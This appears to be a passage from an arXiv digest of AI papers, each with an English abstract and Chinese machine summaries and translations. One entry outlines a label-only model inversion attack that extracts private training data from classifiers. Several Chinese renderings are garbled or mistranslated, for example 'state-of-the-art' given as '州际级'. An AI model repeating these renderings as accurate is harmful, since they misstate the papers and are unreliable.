    Abstract Deep neural networks have achieved remarkable breakthroughs by leveraging multiple layers of data processing to extract hidden representations, albeit at the cost of large electronic computing power. To enhance energy efficiency and speed, the optical implementation of neural networks aims to harness the advantages of optical bandwidth and the energy efficiency of optical interconnections. In the absence of low-power optical nonlinearities, the challenge in the implementation of multilayer optical networks lies in realizing multiple optical layers without resorting to electronic components. In this study, we present a novel framework that uses multiple scattering that is capable of synthesizing programmable linear and nonlinear transformations concurrently at low optical power by leveraging the nonlinear relationship between the scattering potential, represented by data, and the scattered field. Theoretical and experimental investigations show that repeating the data by multiple scattering enables non-linear optical computing at low power continuous wave light.
    摘要 深度神经网络已经取得了非常出色的突破,通过多层数据处理来抽取隐藏表示,尽管在电子计算能力上付出了很大的代价。为了提高能效性和速度,光学实现神经网络尝试利用光学带宽和光学连接的能效性。在没有低功率光学非线性的情况下,实现多层光学网络的挑战在于不使用电子组件来实现多层光学层。在这种研究中,我们提出了一种新的框架,使用多散射来实现可编程的线性和非线性变换,并在低光力短波光下实现多散射。理论和实验研究表明,通过多次散射来重复数据,可以实现低功率连续波光学计算。

LuckyMera: a Modular AI Framework for Building Hybrid NetHack Agents

  • paper_url: http://arxiv.org/abs/2307.08532
  • repo_url: https://github.com/pervasive-ai-lab/luckymera
  • paper_authors: Luigi Quarantiello, Simone Marzeddu, Antonio Guzzi, Vincenzo Lomonaco
  • for: 这个研究目的是为了开发一个轻松易用、可扩展的人工智能框架,用于玩家在roguelike游戏中实现高水平的游戏表现。
  • methods: 这个研究使用了NetHack游戏来测试和训练人工智能代理,并提供了一个高阶的游戏策略设计界面。研究人员还使用了 симвоlic和神经网络模块(称为“技能”),以及实验评估和训练神经网络模型的功能。
  • results: 这个研究显示了一个强大的基准代理,可以在完整的NetHack游戏中实现州际级的表现。此外,研究人员还提供了一个可扩展的框架,可以实现更多的游戏和策略设计。
    Abstract In the last few decades we have witnessed a significant development in Artificial Intelligence (AI) thanks to the availability of a variety of testbeds, mostly based on simulated environments and video games. Among those, roguelike games offer a very good trade-off in terms of complexity of the environment and computational costs, which makes them perfectly suited to test AI agents generalization capabilities. In this work, we present LuckyMera, a flexible, modular, extensible and configurable AI framework built around NetHack, a popular terminal-based, single-player roguelike video game. This library is aimed at simplifying and speeding up the development of AI agents capable of successfully playing the game and offering a high-level interface for designing game strategies. LuckyMera comes with a set of off-the-shelf symbolic and neural modules (called "skills"): these modules can be either hard-coded behaviors, or neural Reinforcement Learning approaches, with the possibility of creating compositional hybrid solutions. Additionally, LuckyMera comes with a set of utility features to save its experiences in the form of trajectories for further analysis and to use them as datasets to train neural modules, with a direct interface to the NetHack Learning Environment and MiniHack. Through an empirical evaluation we validate our skills implementation and propose a strong baseline agent that can reach state-of-the-art performances in the complete NetHack game. LuckyMera is open-source and available at https://github.com/Pervasive-AI-Lab/LuckyMera.
    摘要 最近几十年内,人工智能(AI)领域取得了非常显著的发展,这主要归功于各种测试环境和游戏的可用性。而 roguelike 游戏又在环境复杂度和计算成本之间提供了一个非常好的权衡,使其成为测试 AI 智能体泛化能力的理想选择。在这项工作中,我们提出了 LuckyMera 框架,这是一个围绕 NetHack(一款流行的终端界面单人 roguelike 游戏)构建的灵活、模块化、可配置且可扩展的 AI 框架。该框架旨在简化和加速能够成功游玩该游戏的 AI 智能体的开发,并提供用于设计游戏策略的高级接口。LuckyMera 具有内置的符号和神经网络模块(称为“技能”),这些模块可以是硬编码的行为,也可以是神经强化学习方法,还可以组合成混合解决方案。此外,LuckyMera 还提供了一些实用功能,例如以轨迹形式保存经验以供后续分析,并将其用作数据集来训练神经网络模块,同时可直接与 NetHack 学习环境和 MiniHack 交互。通过实验评估,我们验证了技能模块的实现,并提出了一个强大的基线智能体,它能够在完整的 NetHack 游戏中达到 state-of-the-art 的性能。LuckyMera 是开源的,可在 https://github.com/Pervasive-AI-Lab/LuckyMera 获取。

Image Captions are Natural Prompts for Text-to-Image Models

  • paper_url: http://arxiv.org/abs/2307.08526
  • repo_url: None
  • paper_authors: Shiye Lei, Hao Chen, Sen Zhang, Bo Zhao, Dacheng Tao
  • for: 增强文本生成模型在生成训练数据方面的表现,特别是在面临数据稀缺和隐私泄露问题时。
  • methods: 提出了一种简单 yet effective的方法,通过使用高级captioning模型对实际图像进行描述,从而生成更有信息和多样化的训练数据。
  • results: 在ImageNette、ImageNet-100和ImageNet-1K等 dataset上进行了广泛的实验,结果显示,我们的方法可以significantly improve模型在生成训练数据上的表现,即平均提高10%的分类精度。
    Abstract With the rapid development of Artificial Intelligence Generated Content (AIGC), it has become common practice in many learning tasks to train or fine-tune large models on synthetic data due to the data-scarcity and privacy leakage problems. Albeit promising with unlimited data generation, owing to massive and diverse information conveyed in real images, it is challenging for text-to-image generative models to synthesize informative training data with hand-crafted prompts, which usually leads to inferior generalization performance when training downstream models. In this paper, we theoretically analyze the relationship between the training effect of synthetic data and the synthetic data distribution induced by prompts. Then we correspondingly propose a simple yet effective method that prompts text-to-image generative models to synthesize more informative and diverse training data. Specifically, we caption each real image with the advanced captioning model to obtain informative and faithful prompts that extract class-relevant information and clarify the polysemy of class names. The image captions and class names are concatenated to prompt generative models for training image synthesis. Extensive experiments on ImageNette, ImageNet-100, and ImageNet-1K verify that our method significantly improves the performance of models trained on synthetic training data, i.e., 10% classification accuracy improvements on average.
    摘要 随着人工智能生成内容(AIGC)的快速发展,在许多学习任务中通常使用合成数据进行训练或细化大型模型,因为实际数据的缺乏和隐私泄露问题。虽然有普遍的可访问性和多样性的实际图像信息,但文本生成模型很难通过手工提示生成有用的训练数据,通常会导致下游模型的训练性能不佳。在这篇论文中,我们 theoretically 分析了印杂数据训练的效果和提示所引起的数据分布关系。然后,我们对应提出了一种简单 yet effective 的方法,使文本生成模型在训练图像生成时生成更有用和多样的数据。具体来说,我们使用进步的描述模型将实际图像描述成 faithful 和有用的提示,提取类相关信息并清晰地表达类名的多义性。图像描述和类名被 concatenate 以提交给生成模型进行训练图像生成。广泛的实验结果表明,我们的方法可以在 ImageNette、ImageNet-100 和 ImageNet-1K 上提高模型在合成训练数据上的性能,即平均提高10%的分类精度。
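
A minimal sketch of the prompting recipe: each real image's caption (from an off-the-shelf captioning model) is concatenated with its class name to form the prompt for the text-to-image generator. The template and example strings below are assumptions for illustration only.

```python
def build_prompt(class_name, caption):
    """Concatenate the class name with an informative image caption to prompt a
    text-to-image model; the exact template, captioning model, and generator are
    design choices, not fixed by this sketch."""
    return f"{class_name}, {caption}"

# Hypothetical usage with placeholder captions:
captions = {"img_001.jpg": "a small brown dog running on wet grass"}
prompts = [build_prompt("English springer", cap) for cap in captions.values()]
# Each prompt is then fed to a pretrained text-to-image model (e.g. a diffusion model)
# to synthesize one training image for the corresponding class.
```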

Does Visual Pretraining Help End-to-End Reasoning?

  • paper_url: http://arxiv.org/abs/2307.08506
  • repo_url: None
  • paper_authors: Chen Sun, Calvin Luo, Xingyi Zhou, Anurag Arnab, Cordelia Schmid
  • for: investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, and challenge the common belief that explicit visual abstraction is essential for compositional generalization on visual reasoning.
  • methods: propose a simple and general self-supervised framework which “compresses” each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context.
  • results: observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning, and our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.
    Abstract We aim to investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, with the help of visual pretraining. A positive result would refute the common belief that explicit visual abstraction (e.g. object detection) is essential for compositional generalization on visual reasoning, and confirm the feasibility of a neural network "generalist" to solve visual recognition and reasoning tasks. We propose a simple and general self-supervised framework which "compresses" each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context. To minimize the reconstruction loss, the network must learn a compact representation for each image, as well as capture temporal dynamics and object permanence from temporal context. We perform evaluation on two visual reasoning benchmarks, CATER and ACRE. We observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning. Our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.
    摘要 我们的目标是研究:在视觉预训练的帮助下,是否可以用通用神经网络端到端地学习视觉推理。如果结论是肯定的,这将驳斥“显式视觉抽象(例如物体检测)是视觉推理组合泛化所必需”的普遍看法,并确认一个神经网络“通才”可以同时解决视觉识别与推理任务。我们提出了一个简单而通用的自监督框架:用变换器网络将每帧视频压缩成一小组 token,并基于压缩后的时间上下文重建其余帧。为了最小化重建损失,网络必须为每幅图像学习紧凑的表示,同时从时间上下文中捕捉动态变化和物体的持续存在性。我们在 CATER 和 ACRE 两个视觉推理基准上进行评估,发现预训练对于端到端视觉推理实现组合泛化是必不可少的。我们提出的框架以较大优势超越了传统的有监督预训练,包括图像分类和显式物体检测。
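
Under simplifying assumptions (one token per frame, flattened pixels, a tiny transformer), the toy module below illustrates the self-supervised objective: encode the visible frames into compressed tokens and reconstruct a held-out frame from that temporal context. It is a sketch of the idea only, not the paper's architecture.

```python
import torch
import torch.nn as nn

class FrameCompressor(nn.Module):
    """Toy masked-frame reconstruction: compress visible frames into tokens with a
    transformer encoder and predict the held-out last frame from the temporal context."""
    def __init__(self, dim=128, frame_dim=3 * 32 * 32):
        super().__init__()
        self.embed = nn.Linear(frame_dim, dim)            # one token per frame (simplification)
        layer = nn.TransformerEncoderLayer(d_model=dim, nhead=4, batch_first=True)
        self.encoder = nn.TransformerEncoder(layer, num_layers=2)
        self.decode = nn.Linear(dim, frame_dim)

    def forward(self, frames):                            # frames: (B, T, frame_dim)
        tokens = self.embed(frames[:, :-1])               # compress the visible frames
        context = self.encoder(tokens)                    # temporal reasoning via self-attention
        pred = self.decode(context.mean(dim=1))           # reconstruct the masked last frame
        return ((pred - frames[:, -1]) ** 2).mean()       # reconstruction loss

loss = FrameCompressor()(torch.randn(2, 8, 3 * 32 * 32))
```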

Can We Trust Race Prediction?

  • paper_url: http://arxiv.org/abs/2307.08496
  • repo_url: https://github.com/cangyuanli/pyethnicity
  • paper_authors: Cangyuan Li
  • for: 本研究的目的是提高选民登记数据中的预测性能,并构建美国各州选民登记数据的全面数据库。
  • methods: 本研究使用bidirectional LSTM模型,并将其组合成ensemble模型,可以达到Literature中最高的36.8%的OOS F1分数。
  • results: 本研究构建了美国各州选民登记数据的最全面的数据库,并提供了高质量的比较基准数据集,以帮助未来的模型开发者。
    Abstract In the absence of sensitive race and ethnicity data, researchers, regulators, and firms alike turn to proxies. In this paper, I train a Bidirectional Long Short-Term Memory (BiLSTM) model on a novel dataset of voter registration data from all 50 US states and create an ensemble that achieves up to 36.8% higher out of sample (OOS) F1 scores than the best performing machine learning models in the literature. Additionally, I construct the most comprehensive database of first and surname distributions in the US in order to improve the coverage and accuracy of Bayesian Improved Surname Geocoding (BISG) and Bayesian Improved Firstname Surname Geocoding (BIFSG). Finally, I provide the first high-quality benchmark dataset in order to fairly compare existing models and aid future model developers.
    摘要 在敏感的种族和民族数据缺失的情况下,研究人员、规则制定者和企业都会倾向于使用代理。在这篇论文中,我使用bidirectional long short-term memory(BiLSTM)模型训练了一个新的选民注册数据集,并创建了一个 ensemble,其在外测(OOS) F1 分数上达到了36.8%的提高。此外,我还构建了美国首次和姓氏分布的最全面的数据库,以提高 Bayesian Improved Surname Geocoding(BISG)和 Bayesian Improved Firstname Surname Geocoding(BIFSG)的覆盖率和准确率。最后,我提供了首个高质量的 referential dataset,以公平地比较现有模型并帮助未来的模型开发者。
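
The toy model below shows the general shape of a character-level bidirectional LSTM over a name string; vocabulary size, hidden sizes, and the number of output classes are illustrative assumptions, and the paper's ensemble and training data (state voter files) are not reproduced here.

```python
import torch
import torch.nn as nn

class NameBiLSTM(nn.Module):
    """Character-level BiLSTM over a (first + last) name, followed by a linear classifier."""
    def __init__(self, n_chars=60, emb=32, hidden=64, n_classes=5):
        super().__init__()
        self.emb = nn.Embedding(n_chars, emb, padding_idx=0)
        self.lstm = nn.LSTM(emb, hidden, batch_first=True, bidirectional=True)
        self.head = nn.Linear(2 * hidden, n_classes)

    def forward(self, char_ids):                      # (B, L) integer-encoded characters
        x = self.emb(char_ids)
        _, (h, _) = self.lstm(x)                      # h: (2, B, hidden) final states per direction
        return self.head(torch.cat([h[0], h[1]], dim=1))

logits = NameBiLSTM()(torch.randint(1, 60, (8, 24)))  # batch of 8 names, 24 characters each
```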

  • paper_url: http://arxiv.org/abs/2307.08484
  • repo_url: None
  • paper_authors: Stefan Buijsman
  • for: 本研究旨在为AI系统中的偏见监测和预防提供一个基础。
  • methods: 本研究使用Rawls的正义为公平性提供了一个基础,以帮助决策公平性指标和准确率之间的贸易OFF。
  • results: 研究发现,使用Rawls的正义来导航公平性指标和准确率之间的贸易OFF,可以创造一个基于理论的决策方法,帮助关注最抢夺的群体和对该群体产生最大影响的公平性指标。
    Abstract In order to monitor and prevent bias in AI systems we can use a wide range of (statistical) fairness measures. However, it is mathematically impossible to optimize for all of these measures at the same time. In addition, optimizing a fairness measure often greatly reduces the accuracy of the system (Kozodoi et al, 2022). As a result, we need a substantive theory that informs us how to make these decisions and for what reasons. I show that by using Rawls' notion of justice as fairness, we can create a basis for navigating fairness measures and the accuracy trade-off. In particular, this leads to a principled choice focusing on both the most vulnerable groups and the type of fairness measure that has the biggest impact on that group. This also helps to close part of the gap between philosophical accounts of distributive justice and the fairness literature that has been observed (Kuppler et al, 2021) and to operationalise the value of fairness.
    摘要 要监测和预防人工智能系统中的偏见,我们可以使用一系列(统计)公平度量。然而,从数学角度来看,同时优化所有这些公平度量是不可能的。此外,优化公平度量通常会很大减少系统的准确率(Kozodoi等,2022)。因此,我们需要一种有产物的理论,以帮助我们做出这些决策,并且为什么做出这些决策。我显示,通过使用罗尔斯的公平度量观,我们可以创建一个基于公平度量和准确率之间的平衡的基础。特别是,这会导致一种原则性的选择,集中于最容易受到影响的群体和对该群体有最大影响的公平度量。这也有助于将哲学财富分配正义和公平文献之间的差距降低(Kuppler等,2021),并将公平的价值实践化。

Derivation-Graph-Based Characterizations of Decidable Existential Rule Sets

  • paper_url: http://arxiv.org/abs/2307.08481
  • repo_url: None
  • paper_authors: Tim S. Lyon, Sebastian Rudolph
  • for: 这篇论文目的是为了建立表达力强的类型规则集的代表性定义。
  • methods: 论文使用了 derivation graph 的概念和证明论证来研究存在规则的分析逻辑。
  • results: 论文得到了 gbts 和 cdgs 之间的等价关系,以及 wgbts 和 wcdgs 之间的等价关系。这些结果将有助于深化我们对存在规则的分析逻辑的理解。
    Abstract This paper establishes alternative characterizations of very expressive classes of existential rule sets with decidable query entailment. We consider the notable class of greedy bounded-treewidth sets (gbts) and a new, generalized variant, called weakly gbts (wgbts). Revisiting and building on the notion of derivation graphs, we define (weakly) cycle-free derivation graph sets ((w)cdgs) and employ elaborate proof-theoretic arguments to obtain that gbts and cdgs coincide, as do wgbts and wcdgs. These novel characterizations advance our analytic proof-theoretic understanding of existential rules and will likely be instrumental in practice.
    摘要 本文为具有可判定查询蕴含的高表达力存在规则集类建立了替代性刻画。我们考虑了著名的贪婪有界树宽集(gbts)类,以及一个新的推广变体,称为弱 gbts(wgbts)。在重新审视并扩展推导图(derivation graph)概念的基础上,我们定义了(弱)无环推导图集((w)cdgs),并通过细致的证明论论证得到:gbts 与 cdgs 等价,wgbts 与 wcdgs 等价。这些新的刻画加深了我们对存在规则的证明论理解,并有望在实践中发挥作用。

Clarifying the Half Full or Half Empty Question: Multimodal Container Classification

  • paper_url: http://arxiv.org/abs/2307.08471
  • repo_url: None
  • paper_authors: Josua Spisak, Matthias Kerzel, Stefan Wermter
  • for: 这篇论文主要是为了研究多模态融合的问题,以提高机器人的感知能力。
  • methods: 本论文使用了不同的融合策略,将视觉、感觉和自带感知数据融合在一起,以便在分类容器和其内容时使用多模态信息。
  • results: 研究发现,使用多模态融合策略可以提高分类精度,比使用单一感知信息高出15%。
    Abstract Multimodal integration is a key component of allowing robots to perceive the world. Multimodality comes with multiple challenges that have to be considered, such as how to integrate and fuse the data. In this paper, we compare different possibilities of fusing visual, tactile and proprioceptive data. The data is directly recorded on the NICOL robot in an experimental setup in which the robot has to classify containers and their content. Due to the different nature of the containers, the use of the modalities can wildly differ between the classes. We demonstrate the superiority of multimodal solutions in this use case and evaluate three fusion strategies that integrate the data at different time steps. We find that the accuracy of the best fusion strategy is 15% higher than the best strategy using only one singular sense.
    摘要 多模态整合是让机器人感知世界的关键组件。多模态带来多种需要考虑的挑战,例如如何集成和融合数据。本文比较了融合视觉、触觉和本体感觉数据的不同方式。数据直接记录在 NICOL 机器人上,在一个实验装置中,机器人需要对容器及其内容进行分类。由于容器的性质不同,不同类别对各模态的依赖程度可能差异很大。我们展示了多模态解决方案在该用例中的优越性,并评估了三种在不同时间步骤上融合数据的策略。我们发现,最佳融合策略的准确率比仅使用单一感知模态的最佳策略高出 15%。
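
As a hedged sketch of one possible fusion strategy, the module below encodes visual, tactile, and proprioceptive features separately and concatenates them before a shared classification head; feature dimensions and class count are assumptions, and the paper compares several strategies that fuse the modalities at different time steps.

```python
import torch
import torch.nn as nn

class LateFusionClassifier(nn.Module):
    """Minimal late-fusion baseline: per-modality encoders followed by concatenation."""
    def __init__(self, d_vision=256, d_tactile=32, d_proprio=16, n_classes=8):
        super().__init__()
        self.enc_v = nn.Sequential(nn.Linear(d_vision, 64), nn.ReLU())
        self.enc_t = nn.Sequential(nn.Linear(d_tactile, 64), nn.ReLU())
        self.enc_p = nn.Sequential(nn.Linear(d_proprio, 64), nn.ReLU())
        self.head = nn.Linear(3 * 64, n_classes)

    def forward(self, vision, tactile, proprio):
        fused = torch.cat([self.enc_v(vision), self.enc_t(tactile), self.enc_p(proprio)], dim=-1)
        return self.head(fused)

logits = LateFusionClassifier()(torch.randn(4, 256), torch.randn(4, 32), torch.randn(4, 16))
```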

Towards eXplainable AI for Mobility Data Science

  • paper_url: http://arxiv.org/abs/2307.08461
  • repo_url: None
  • paper_authors: Anahid Jalali, Anita Graser, Clemens Heistracher
  • for: 本研究目的是为了实现行动数据科学应用中的可解释性模型,即可以从稠密轨迹数据,如汽车和船用的GPS轨迹数据中学习的模型,并提供可理解的解释。
  • methods: 本研究使用了时间图 neural networks (GNNs)和 counterfactuals 来实现可解释的模型,并评估了这些方法在不同的数据集上的性能。
  • results: 本研究提出了一种研究路径,以便实现行动数据科学中的可解释性模型,并评估了现有的 GeoXAI 研究,认为需要更加人类中心的解释方法。
    Abstract This paper presents our ongoing work towards XAI for Mobility Data Science applications, focusing on explainable models that can learn from dense trajectory data, such as GPS tracks of vehicles and vessels using temporal graph neural networks (GNNs) and counterfactuals. We review the existing GeoXAI studies, argue the need for comprehensible explanations with human-centered approaches, and outline a research path toward XAI for Mobility Data Science.
    摘要 本文介绍了我们面向移动数据科学应用的可解释人工智能(XAI)的进行中工作,重点关注能够从稠密轨迹数据(如车辆和船舶的 GPS 轨迹)中学习并给出解释的模型,采用时序图神经网络(GNN)与反事实方法。我们回顾了现有的 GeoXAI 研究,论证了以人为中心、易于理解的解释的必要性,并勾勒出面向移动数据科学的 XAI 研究路线。

Long-range Dependency based Multi-Layer Perceptron for Heterogeneous Information Networks

  • paper_url: http://arxiv.org/abs/2307.08430
  • repo_url: https://github.com/jhl-hust/ldmlp
  • paper_authors: Chao Li, Zijie Guo, Qiuting He, Hao Xu, Kun He
  • for: 这篇论文旨在解决现有异质图神经网络(HGNNs)中长距离依赖利用不足的问题,以提高 HGNNs 的性能和效率。
  • methods: 本文提出了 Long-range Dependency based Multi-Layer Perceptron(LDMLP),通过搜索阶段自动发现有效的 meta-paths,以降低高昂的计算与内存成本;在搜索阶段,LDMLP 仅使用多层感知机这一简单架构,以提高所搜索到的 meta-paths 的泛化性。
  • results: 实验结果显示,LDMLP 在八个异质图数据集上取得 state-of-the-art 的性能,同时具有高效率和良好的泛化性,尤其是在稀疏 HINs 上。此外,所搜索到的 meta-paths 还能提升其他 HGNNs(如 HAN 和 SeHGNN)的性能。
    Abstract Existing heterogeneous graph neural networks (HGNNs) have achieved great success in utilizing the rich semantic information in heterogeneous information networks (HINs). However, few works have delved into the utilization of long-range dependencies in HINs, which is extremely valuable as many real-world HINs are sparse, and each node has only a few directly connected neighbors. Although some HGNNs can utilize distant neighbors by stacking multiple layers or leveraging long meta-paths, the exponentially increased number of nodes in the receptive field or the number of meta-paths incurs high computation and memory costs. To address these issues, we investigate the importance of different meta-paths and propose Long-range Dependency based Multi-Layer Perceptron (LDMLP). Specifically, to solve the high-cost problem of leveraging long-range dependencies, LDMLP adopts a search stage to discover effective meta-paths automatically, reducing the exponentially increased number of meta-paths to a constant. To avoid the influence of specific modules on search results, LDMLP utilizes a simple architecture with only multi-layer perceptions in the search stage, improving the generalization of searched meta-paths. As a result, the searched meta-paths not only perform well in LDMLP but also enable other HGNNs like HAN and SeHGNN to perform better. Extensive experiments on eight heterogeneous datasets demonstrate that LDMLP achieves state-of-the-art performance while enjoying high efficiency and generalization, especially on sparse HINs.
    摘要 现有的异种图 neural network (HGNN) 已经在异种信息网络 (HIN) 中获得了很大的成功,但是很少的研究者在 HIN 中利用长距离依赖关系,这对于许多实际世界 HIN 来说是非常有价值的,因为每个节点通常只有几个直接连接的邻居。虽然一些 HGNN 可以利用远程邻居,但是通过堆叠多层或利用长媒体路径来实现,导致计算和存储成本随着节点数量的增加而呈指数增长。为解决这些问题,我们调查不同的媒体路径的重要性并提出了 Long-range Dependency based Multi-Layer Perceptron (LDMLP)。具体来说,为解决长距离依赖关系的高计算成本问题,LDMLP 采用了搜索阶段自动发现有效的媒体路径,从而将 exponentially 增加的节点数量降低到常数。此外,为确保搜索结果不受特定模块的影响,LDMLP 使用了简单的架构,只有多层感知,从而提高了搜索的通用性。因此,搜索到的媒体路径不仅在 LDMLP 中表现良好,还可以使得其他 HGNN 如 HAN 和 SeHGNN 表现更好。我们在八个异种数据集进行了广泛的实验,结果表明,LDMLP 可以 дости得状态 искусственный智能性的表现,同时具有高效性和通用性,特别是在稀有 HIN 上。

Unstoppable Attack: Label-Only Model Inversion via Conditional Diffusion Model

  • paper_url: http://arxiv.org/abs/2307.08424
  • repo_url: None
  • paper_authors: Rongke Liu
  • for: The paper addresses model inversion attacks (MIAs) in deep learning models, specifically in label-only black-box scenarios where the attacker has no access to the model's parameters.
  • methods: The paper proposes a novel MIA that uses a conditional diffusion model to recover precise samples of the target without any extra optimization, relying on two primary techniques: selecting an auxiliary dataset relevant to the target model's task, and using the target labels together with random standard normally distributed noise as conditions to guide the training process.
  • results: The method generates data similar and accurate to the target without optimization and outperforms generators of previous approaches in the label-only scenario; the paper evaluates the attack with Learned Perceptual Image Patch Similarity (LPIPS) among other metrics, reporting high attack accuracy, realism, and similarity.
    Abstract Model inversion attacks (MIAs) are aimed at recovering private data from a target model's training set, which poses a threat to the privacy of deep learning models. MIAs primarily focus on the white-box scenario where the attacker has full access to the structure and parameters of the target model. However, practical applications are black-box, it is not easy for adversaries to obtain model-related parameters, and various models only output predicted labels. Existing black-box MIAs primarily focused on designing the optimization strategy, and the generative model is only migrated from the GAN used in white-box MIA. Our research is the pioneering study of feasible attack models in label-only black-box scenarios, to the best of our knowledge. In this paper, we develop a novel method of MIA using the conditional diffusion model to recover the precise sample of the target without any extra optimization, as long as the target model outputs the label. Two primary techniques are introduced to execute the attack. Firstly, select an auxiliary dataset that is relevant to the target model task, and the labels predicted by the target model are used as conditions to guide the training process. Secondly, target labels and random standard normally distributed noise are input into the trained conditional diffusion model, generating target samples with pre-defined guidance strength. We then filter out the most robust and representative samples. Furthermore, we propose for the first time to use Learned Perceptual Image Patch Similarity (LPIPS) as one of the evaluation metrics for MIA, with systematic quantitative and qualitative evaluation in terms of attack accuracy, realism, and similarity. Experimental results show that this method can generate similar and accurate data to the target without optimization and outperforms generators of previous approaches in the label-only scenario.
    摘要 模型反推攻击(MIA)是target模型的训练集中私人数据的恢复,这种攻击对深度学习模型的隐私造成了威胁。MIA主要在白盒enario中进行,攻击者可以完全访问目标模型的结构和参数。然而,在实际应用中,敌方通常无法获得模型相关的参数,只有输出预测标签。现有的黑盒MIA主要关注于设计优化策略,而模型migrated from GAN在白盒MIA中使用。我们的研究是黑盒MIA的开拓性研究,到我们所知道的范围内是首次。在这篇论文中,我们开发了一种使用conditional diffusion模型来恢复target模型的准确样本,不需要任何额外优化。只要target模型输出标签,我们就可以通过以下两种技术来执行攻击。首先,选择一个相关的auxiliary dataset,并使用目标模型预测的标签作为准则来导引训练过程。其次,通过对已经训练的conditional diffusion模型中的标签和随机标准差分布噪声输入,生成具有预定的导向强度的目标样本。然后,我们将过滤出最Robust和代表性最高的样本。此外,我们还提出了在MIA中使用Learned Perceptual Image Patch Similarity(LPIPS)作为评价指标,并进行系统atic quantitative和质量评价,包括攻击准确率、真实性和相似性。实验结果表明,这种方法可以生成与目标模型无需优化的准确和真实的数据,并且在黑盒scenario中超越了前一代方法的生成器。
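
The snippet below sketches only the final filtering step: among images generated by the label-conditioned diffusion model, keep the candidates whose predicted label stays equal to the target label under small perturbations. The robustness criterion and the toy `predict_label` function are assumptions for illustration; the paper's exact selection procedure may differ.

```python
import torch

@torch.no_grad()
def filter_robust(candidates, predict_label, target_label, n_trials=8, noise=0.03, keep=4):
    """Keep the generated candidates whose predicted label remains the target label
    under small random perturbations; predict_label is the label-only black-box model."""
    scores = []
    for x in candidates:
        hits = sum(predict_label(x + noise * torch.randn_like(x)) == target_label
                   for _ in range(n_trials))
        scores.append(hits)
    order = sorted(range(len(candidates)), key=lambda i: -scores[i])
    return [candidates[i] for i in order[:keep]]

# Toy usage with placeholder candidates and a stand-in label-only classifier:
candidates = [torch.randn(3, 64, 64) for _ in range(16)]
selected = filter_robust(candidates, predict_label=lambda x: int(x.mean() > 0), target_label=1)
```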

Systematic Comparison of Software Agents and Digital Twins: Differences, Similarities, and Synergies in Industrial Production

  • paper_url: http://arxiv.org/abs/2307.08421
  • repo_url: None
  • paper_authors: Lasse Matthias Reinpold, Lukas Peter Wagner, Felix Gehlhoff, Malte Ramonat, Maximilian Kilthau, Milapji Singh Gill, Jonathan Tobias Reif, Vincent Henkel, Lena Scholz, Alexander Fay
  • for: This paper compares and contrasts the use of Software Agents (Agents) and Digital Twins (DTs) in industrial applications, with the goal of determining their differences, similarities, and potential synergies.
  • methods: The comparison is based on the purposes for which Agents and DTs are applied, the properties and capabilities exhibited by these software paradigms, and how they can be allocated within the Reference Architecture Model Industry 4.0.
  • results: The study finds that Agents are commonly employed in the collaborative planning and execution of production processes, while DTs typically play a more passive role in monitoring production resources and processing information; the analysis suggests that a combination of Agents and DTs would demonstrate high degrees of intelligence, autonomy, sociability, and fidelity, but further standardization is required, particularly in the field of DTs.
    Abstract To achieve a highly agile and flexible production, it is envisioned that industrial production systems gradually become more decentralized, interconnected, and intelligent. Within this vision, production assets collaborate with each other, exhibiting a high degree of autonomy. Furthermore, knowledge about individual production assets is readily available throughout their entire life-cycles. To realize this vision, adequate use of information technology is required. Two commonly applied software paradigms in this context are Software Agents (referred to as Agents) and Digital Twins (DTs). This work presents a systematic comparison of Agents and DTs in industrial applications. The goal of the study is to determine the differences, similarities, and potential synergies between the two paradigms. The comparison is based on the purposes for which Agents and DTs are applied, the properties and capabilities exhibited by these software paradigms, and how they can be allocated within the Reference Architecture Model Industry 4.0. The comparison reveals that Agents are commonly employed in the collaborative planning and execution of production processes, while DTs typically play a more passive role in monitoring production resources and processing information. Although these observations imply characteristic sets of capabilities and properties for both Agents and DTs, a clear and definitive distinction between the two paradigms cannot be made. Instead, the analysis indicates that production assets utilizing a combination of Agents and DTs would demonstrate high degrees of intelligence, autonomy, sociability, and fidelity. To achieve this, further standardization is required, particularly in the field of DTs.
    摘要 为实现高度敏捷和灵活的生产,人们设想工业生产系统将逐步变得更加去中心化、互联化和智能化。在这一愿景中,生产资产之间相互协作,表现出高度的自主性;同时,关于单个生产资产的知识在其整个生命周期内随时可用。要实现这一愿景,需要恰当地运用信息技术。在这一背景下,两种常用的软件范式是软件代理(Agents)和数字孪生(DTs)。本文对 Agents 与 DTs 在工业应用中的使用进行了系统比较,旨在确定这两种范式之间的差异、相似之处及潜在协同效应。比较基于 Agents 与 DTs 的应用目的、二者所表现出的特性与能力,以及它们在工业 4.0 参考架构模型中的定位。比较结果表明,Agents 通常用于生产过程的协同规划与执行,而 DTs 通常在监控生产资源和处理信息方面扮演较为被动的角色。尽管这些观察为 Agents 和 DTs 分别勾勒出了各自典型的能力与特性,但无法在两种范式之间划出清晰而确定的界线。相反,分析表明,结合使用 Agents 与 DTs 的生产资产将表现出高度的智能性、自主性、社交性和保真度。要实现这一点,还需要进一步的标准化工作,尤其是在 DTs 领域。

Neurosymbolic AI for Reasoning on Biomedical Knowledge Graphs

  • paper_url: http://arxiv.org/abs/2307.08411
  • repo_url: None
  • paper_authors: Lauren Nicole DeLong, Ramon Fernández Mir, Zonglin Ji, Fiona Niamh Coulter Smith, Jacques D. Fleuriot
  • for: 这篇论文探讨生物医学知识图谱的补全(KG completion)问题,以及如何使用神经符号人工智能技术来解决这一问题。
  • methods: 论文综述了基于神经符号人工智能的混合方法,并与以往基于规则或基于嵌入的知识图谱补全方法进行对比。
  • results: 论文着重讨论了这些混合方法的独特性质,认为它们尤其适合应对生物医学领域的挑战,并分析了其用途与潜在益处。
    Abstract Biomedical datasets are often modeled as knowledge graphs (KGs) because they capture the multi-relational, heterogeneous, and dynamic natures of biomedical systems. KG completion (KGC), can, therefore, help researchers make predictions to inform tasks like drug repositioning. While previous approaches for KGC were either rule-based or embedding-based, hybrid approaches based on neurosymbolic artificial intelligence are becoming more popular. Many of these methods possess unique characteristics which make them even better suited toward biomedical challenges. Here, we survey such approaches with an emphasis on their utilities and prospective benefits for biomedicine.
